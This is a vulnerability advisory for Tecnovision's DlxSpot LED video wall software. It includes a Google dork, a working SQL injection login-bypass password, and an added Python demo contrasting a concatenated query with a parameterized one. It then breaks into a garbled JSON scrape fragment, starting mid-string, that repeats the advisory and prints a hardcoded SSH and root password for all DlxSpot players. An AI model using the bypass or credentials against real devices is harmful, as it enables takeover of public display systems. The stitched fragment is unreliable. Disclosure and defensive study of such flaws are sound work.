ID: PACKETSTORM:144257
Type: packetstorm
Reporter: Simon Brannstrom
Modified: 2017-09-19T00:00:00
Description
`# Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL
Injection
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: >1.5.10
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls
all over the world, they are used in football arenas, concert halls,
shopping malls, as roadsigns etc.
# CVE: CVE-2017-12930
# Linked CVE's: CVE-2017-12928, CVE-2017-12929
# Visit my github page at
https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
for complete takeover of the box, from SQLi to full root access.
###############################################################################################################################
DlxSpot Player 4 above version 1.5.10 suffers from an SQL injection
vulnerability in the admin interface login and is exploitable the following
way:
username:admin
password:x' or 'x'='x
TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer
homepage.
2017-06-01 - No response, tried contacting again through several contact
forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
email in Italian to the company.
2017-09-18 - No response, full public disclosure.
`
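
Why the password in the advisory works, shown against a constructed SQLite table next to a parameterized check that rejects it. This is an added example, not code from the advisory or from DlxSpot; the table schema, the function names and the string-built query are assumptions, since the advisory does not show the backend query.

```python
import hashlib
import hmac
import os
import sqlite3

# Password value quoted in the advisory (CVE-2017-12930).
ADVISORY_PASSWORD = "x' or 'x'='x"
REAL_PASSWORD = "correct horse"  # constructed sample credential
PBKDF2_ROUNDS = 100_000


def make_db():
    """Build a constructed in-memory user table (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users ("
        "username TEXT PRIMARY KEY, password TEXT, salt BLOB, pw_hash BLOB)"
    )
    salt = os.urandom(16)
    pw_hash = hashlib.pbkdf2_hmac(
        "sha256", REAL_PASSWORD.encode(), salt, PBKDF2_ROUNDS
    )
    # The plaintext column exists only so the vulnerable check has
    # something to compare against; the hardened check never reads it.
    db.execute(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        ("admin", REAL_PASSWORD, salt, pw_hash),
    )
    return db


def build_concatenated_query(username, password):
    """Assumed vulnerable pattern: user input pasted into the SQL text."""
    return (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )


def login_concatenated(db, username, password):
    """Vulnerable check: succeeds whenever the query returns any row."""
    row = db.execute(build_concatenated_query(username, password)).fetchone()
    return row is not None


def login_parameterized(db, username, password):
    """Hardened check: input is bound as data, and the password is
    verified in application code against a salted hash."""
    row = db.execute(
        "SELECT salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    salt, stored = row
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), salt, PBKDF2_ROUNDS
    )
    return hmac.compare_digest(candidate, stored)


if __name__ == "__main__":
    db = make_db()
    # The quote in the input closes the string literal, so the WHERE
    # clause parses as (username = .. AND password = 'x') OR 'x' = 'x',
    # which is true for every row in the table.
    print(build_concatenated_query("admin", ADVISORY_PASSWORD))
    print("concatenated :", login_concatenated(db, "admin", ADVISORY_PASSWORD))
    print("parameterized:", login_parameterized(db, "admin", ADVISORY_PASSWORD))
```
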
at\r\nhttps://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md\r\nfor complete takeover of the box, from SQLi to full root access.\r\n###############################################################################################################################\r\n \r\nDlxSpot Player 4 above version 1.5.10 suffers from an SQL injection\r\nvulnerability in the admin interface login and is exploitable the following\r\nway:\r\n \r\nusername:admin\r\npassword:x' or 'x'='x\r\n \r\nTIMELINE:\r\n2017-05-14 - Discovery of vulnerabilities.\r\n2017-05-15 - Contacted Tecnovision through contact form on manufacturer\r\nhomepage.\r\n2017-06-01 - No response, tried contacting again through several contact\r\nforms on homepage.\r\n2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)\r\nrequesting CVE assignment.\r\n2017-08-17 - Three CVE's assigned for the vulnerabilities found.\r\n2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an\r\nemail in Italian to the company.\r\n2017-09-18 - No response, full public disclosure.\r\n \r\n DEDICATED TO MARCUS ASTROM\r\nFOREVER LOVED - NEVER FORGOTTEN\n\n# 0day.today [2018-03-05] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28587"}, {"lastseen": "2018-03-06T22:05:15", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2017-09-19T00:00:00", "title": "Tecnovision DLX Spot - SSH Backdoor Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12928"], "modified": "2017-09-19T00:00:00", "href": "https://0day.today/exploit/description/28586", "id": "1337DAY-ID-28586", "sourceData": "# Exploit Title: DlxSpot - Player4 LED video wall - Hardcoded Root SSH Password.\r\n# Google Dork: \"DlxSpot - Player4\"\r\n# Date: 2017-05-14\r\n# Discoverer: Simon Brannstrom\r\n# Authors Website: https://unknownpwn.github.io/\r\n# Vendor 
Homepage: http://www.tecnovision.com/\r\n# Software Link: n/a\r\n# Version: All known versions\r\n# Tested on: Linux\r\n# About: DlxSpot is the software controlling Tecnovision LED Video Walls all over the world, they are used in football arenas, concert halls, shopping malls, as roadsigns etc.\r\n# CVE: CVE-2017-12928\r\n# Linked CVE's: CVE-2017-12929, CVE-2017-12930\r\n \r\n# Visit my github page at https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md for complete takeover of the box, from SQLi to root access.\r\n###############################################################################################################################\r\n \r\nHardcoded password for all dlxspot players, login with the following credentials via SSH\r\n \r\nusername: dlxuser\r\npassword: tecn0visi0n\r\n \r\nEscalate to root with the same password.\r\n \r\nTIMELINE:\r\n2017-05-14 - Discovery of vulnerabilities.\r\n2017-05-15 - Contacted Tecnovision through contact form on manufacturer homepage.\r\n2017-06-01 - No response, tried contacting again through several contact forms on homepage.\r\n2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) requesting CVE assignment.\r\n2017-08-17 - Three CVE's assigned for the vulnerabilities found.\r\n2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an email in Italian to the company.\r\n2017-09-18 - No response, full public disclosure.\r\n \r\n DEDICATED TO MARCUS ASTROM\r\nFOREVER LOVED - NEVER FORGOTTEN\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/28586"}]}